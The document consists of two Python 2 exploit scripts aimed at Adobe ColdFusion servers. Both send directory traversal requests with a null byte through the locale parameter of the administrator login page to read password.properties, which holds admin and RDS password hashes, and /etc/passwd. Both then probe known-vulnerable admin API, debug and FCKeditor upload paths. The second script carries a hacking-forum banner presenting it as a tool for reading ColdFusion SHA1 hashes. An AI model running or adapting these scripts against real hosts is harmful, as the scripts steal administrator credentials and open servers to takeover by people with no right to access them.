#!/usr/bin/env python #-*- coding:utf-8 -*- import sys import threading import urllib import httplib class Mythread(threading.Thread): def __init__(self,host): threading.Thread.__init__(self) self.host = host def run(self): urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en'] try: for path in urls: out = urllib.urlopen(self.host + path).read().split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n') print out except Exception: print "Error connect time" self.scanner() def scanner(self): #self.host = host cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm', '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm', '/CFIDE/adminapi/_datasource/geturldefaults.cfm', '/CFIDE/adminapi/_datasource/setdsn.cfm', '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm', '/CFIDE/adminapi/_datasource/setsldatasource.cfm', '/CFIDE/adminapi/customtags/l10n.cfm', '/CFIDE/debug/cf_debugFr.cfm', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'] i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"} for fckpath in cfmfck: if self.host[0:8] == "https://": conn = httplib.HTTPSConnection(self.host.replace("https://","")) else: conn = httplib.HTTPConnection(self.host.replace("http://","")) conn.request('GET',fckpath,headers = i_headers) r1 = conn.getresponse() if r1.status == 200 or r1.status == 500 or r1.status == 403: print self.host + fckpath + " " + str(r1.status) if __name__ == "__main__": Mythread(sys.argv[1]).start()
#!/usr/bin/env python # -*- coding: utf8 -*- import sys , urllib , httplib , subprocess def banner(): print """ #--------------------------------------------------# # Welcome to www.90sec.org # # THis is read ColdFusion sha1 Tool # # python COldFusion.py www.WebSite.cn # #--------------------------------------------------# """ urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en', '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en'] cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'] try: host = sys.argv[1] if len(host) < '0': banner() for url in urls: context = urllib.urlopen(host + url).read() out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n') print out except Exception: banner() sys.exit() else: for line in cfmfck: host = host.replace("http://","") line = line.replace("\n","") line = "/" + line website = host + line connection = httplib.HTTPConnection(host) connection.request("GET",line) response = connection.getresponse() if response.status == 200: print website , '200' elif response.status == 403: print website , '403' elif response.status == 500: print website , 'server ERROR'